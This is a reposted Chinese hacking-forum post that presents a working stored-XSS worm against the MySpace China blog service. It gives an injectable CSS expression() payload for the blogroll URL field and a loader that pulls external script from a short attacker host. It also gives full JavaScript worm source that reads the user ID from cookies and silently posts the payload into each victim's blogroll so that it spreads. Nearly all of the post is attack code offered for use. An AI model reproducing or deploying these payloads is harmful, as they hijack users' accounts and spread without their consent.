发新话题
打印

[转载]myspace ajax worm

[转载]myspace ajax worm

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
:www.ood.name
目标网址:http://blog.myspace.cn/
在友情链接–>管理中,网址可以加入Js,形如:

http://x.cn" style="windth:expression(if(window.x!=1){alert(document.cookie);window.x=1;})

如果要加入一个外部Js,方法很多,但用document.write的话会使页面一片空白,只留下我们的Js.所以要使js是增加而不是重写,要用到下面的方法:

<script>h=document.createElement(’script’);h.src=’http://xss.cn’;k=document.getElementsByTagName(’head’)[0];k.appendChild(h);</script>

注意http://xss.cn,因为网址的地方输入的字符有限,所以这个网址要很短,完整的代码是:

http://x.cn" style="windth:expression(if(window.x!=1){eval(unescape(’h%3Ddocument.createElement%28%27script%27%29%3Bh.src%3D%27http%3A//xss.cn%27%3Bk%3Ddocument.getElementsByTagName%28%27head%27%29%5B0%5D%3Bk.appendChild%28h%29%3B’));window.x=1})

注意复制这段代码的时候不要勾选自动换行。
下面是完整的代码,我没有做马赛克的修改,:P

var id=id();
var check=check();
function createAjax()
{
    var xmlhttp;
    try {
        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {
        try {
            xmlhttp=new XMLHttpRequest();
        }
        catch (e) {
            xmlhttp=false;
        }
    }
    return xmlhttp;
}
function check()
{   
var url = "http://blog.myspace.cn/" + id;
var xmlhttp = createAjax();
xmlhttp.open(’get’, url, false);
    xmlhttp.send();
var page = xmlhttp.responseText;
    var check=page.indexOf("x.cn");
    return check;
}
function id()
{
var cookie = document.cookie;
var cook = cookie.split(";");
var x = cookie.indexOf("ShutterUser=");
var y = cookie.indexOf("false");
var id = cookie.substring(x + 12, y-1);
return id;
}
function postdata()
{        
        if (check == -1) {
var xmlhttp = createAjax();
if (xmlhttp) {
var useragent = navigator.userAgent;
var url = "http://blog.myspace.cn/" + id + "/Admin/PageV3/BlogRollMgmt.aspx";
var data = "__EVENTTARGET=ctl00%24Main%24UC_BlogRollMgmt%24AddLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg4Njk0NzQzMA9kFgJmD2QWBGYPZBYGAgUPZBYCZg8WAh4EVGV4dAVe566h55CG5Y%2BL5oOF6ZO%2B5o6lIC0g5aSp5aCC55qE5Y2a5a6iIC0gTXlTcGFjZeiBmuWPiyAtIOaPkOS%2Bm%2BWFjei0ueazqOWGjOeahOS4quS6uuWNmuWuouepuumXtGQCBg8WAh4HY29udGVudAWsAeWkqeWggueah

OWNmuWuoiAtIE15U3BhY2XogZrlj4sgLSDmj5DkvpvlhY3otLnms6jlhoznmoTkuKrkurrljZrlrqLnqbrpl7

TvvIzlubbkuJTljIXmi6zmnInlqLHkuZDmmI7mmJ%2FljZrlrqLjgIHmrYzmiYvljZrlrqLjgIHlkI3kurrljZrlrqLjgIHmg4XmhJ%2FljZrlrqLlkozojYnmoLnljZrlrqLnrYlkAgcPFgIfAQUj5aSp5aCCIE15U3BhY2XljZrlrqIgTXlTcGFjZSzogZrlj4tkAg

IPZBYKAgQPZBYKZg8WAh4FY2xhc3MFC2xpX3NlbGVjdGVkFgJmDxYEHwIFC3N1Ym5hdl9saW5rHgRocm

VmBTVodHRwOi8vYmxvZy5teXNwYWNlLmNuLzEzMTEwNDE3MDgvRW50cnlUaXRsZUxpc3QuYXNwe

GQCAQ8WAh8CBQ1saV9saW5lX2FmdGVyFgJmDxYEHwJlHwMFVGh0dHA6Ly9ibG9nLm15c3BhY2Uu

Y24vMTMxMTA0MTcwOC9BZG1pbi9QYWdlVjMvTWFuYWdlck15RnJpZW5kQmxvZ1Bvc3RUaXRs

ZUxpc3QuYXNweGQCAg8WAh8CZRYCZg8WBB8CZR8DBU9odHRwOi8vYmxvZy5teXNwYWNlLm

NuLzEzMTEwNDE3MDgvQWRtaW4vUGFnZVYzL01hbmFnZXJNeVN1YnNjcmliZVRpdGxlTGlzdC5

hc3B4ZAIDDxYCHwJlFgJmDxYEHwJlHwMFRmh0dHA6Ly9ibG9nLm15c3BhY2UuY24vMTMxMTA0MT

cwOC9BZG1pbi9QYWdlVjMvTWFuYWdlclB1YmxpY2F0aW9uLmFzcHhkAgQPFgIfAmUWAmYPFgQfAm

UfAwVMaHR0cDovL2Jsb2cubXlzcGFjZS5jbi8xMzExMDQxNzA4L0FkbWluL1BhZ2VWMy9NYW5hZ2V

yTXlDb21tZW50X2J5RW50cnkuYXNweGQCBQ9kFgJmDw8WAh4HVmlzaWJsZWhkZAIID2QWAgI

BDxYEHgtfIUl0ZW1Db3VudGYfBGdkAgkPZBYCZg8WBB8FZh8EZ2QCEA9kFgICAQ9kFgICAw8

WAh8EZxYGAgEPFgIfBGdkAgMPFgIfBGdkAgUPDxYCHwRnZGRkwqSmyqXVU3mOlXcCgUO

uhaQlmNg%3D&ctl00%24Main%24UC_BlogRollMgmt%24AddLinkTitleInput=baidu&ctl00%24Main%24UC_BlogRollMgmt%24AddLinkUrlInput=http%3A%2F%2Fx.cn%22+style%3D%22windth%3Aexpression%28if%28window.x%21%3D1%29%7Beval%28unescape%28%27h%253Ddocument.createElement%2528%2527script%2527%2529%253Bh.src%253D%2527http%253A%2F%2Fxss.cn%2527%253Bk%253Ddocument.getElementsByTagName%2528%2527head%2527%2529%255B0%255D%253Bk.appendChild%2528h%2529%253B%27%29%29%3Bwindow.x%3D1%7D%29"
xmlhttp.open("post", url, true);
xmlhttp.setRequestHeader("Accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, application/x-silverlight, application/vnd.ms-powerpoint, */*");
xmlhttp.setRequestHeader("Referer", url);
xmlhttp.setRequestHeader("Accept-Language", "zh-cn");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Accept-Encoding", "gzip, deflate");
xmlhttp.setRequestHeader("User-Agent", useragent);
xmlhttp.setRequestHeader("Host", "blog.myspace.cn");
xmlhttp.setRequestHeader("Content-Length", data.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.setRequestHeader("Cache-Control", "no-cache");
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
}
}
xmlhttp.send(data);
}
}
else{}
}
postdata();
select girl from Guilin where age='18-20' and bg='beautiful'--

TOP

发新话题